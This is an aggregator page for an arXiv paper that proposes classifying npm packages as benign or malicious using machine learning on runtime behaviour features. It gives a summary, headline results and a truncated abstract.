Towards Classifying Benign And Malicious Packages Using Machine Learning

Thanh-Cong Nguyen; Ngoc-Thanh Nguyen; Van-Giau Ung; Duc-Ly Vu

arXiv:2511.15033·cs.CR·November 20, 2025

Towards Classifying Benign And Malicious Packages Using Machine Learning

Thanh-Cong Nguyen, Ngoc-Thanh Nguyen, Van-Giau Ung, Duc-Ly Vu

PDF

Open Access

TL;DR

This paper presents a machine learning-based method to classify open-source packages as benign or malicious by analyzing runtime behaviors, achieving high accuracy with an AUC of 0.91 on npm packages.

Contribution

It introduces a novel approach that uses dynamic analysis features combined with machine learning for automatic malicious package detection.

Findings

01

Achieved an AUC of 0.91 in classification accuracy.

02

False positive rate nearly 0%.

03

Effective differentiation between benign and malicious packages.

Abstract

Recently, the number of malicious open-source packages in package repositories has been increasing dramatically. While major security scanners focus on identifying known Common Vulnerabilities and Exposures (CVEs) in open-source packages, there are very few studies on detecting malicious packages. Malicious open-source package detection typically requires static, dynamic analysis, or both. Dynamic analysis is more effective as it can expose a package's behaviors at runtime. However, current dynamic analysis tools (e.g., ossf's package-analysis) lack an automatic method to differentiate malicious packages from benign packages. In this paper, we propose an approach to extract the features from dynamic analysis (e.g., executed commands) and leverage machine learning techniques to automatically classify packages as benign or malicious. Our evaluation of nearly 2000 packages on npm shows…

Peer Reviews

No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.

Videos

No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.

Taxonomy

TopicsPhysical Unclonable Functions (PUFs) and Hardware Security · Advanced Malware Detection Techniques · Security and Verification in Computing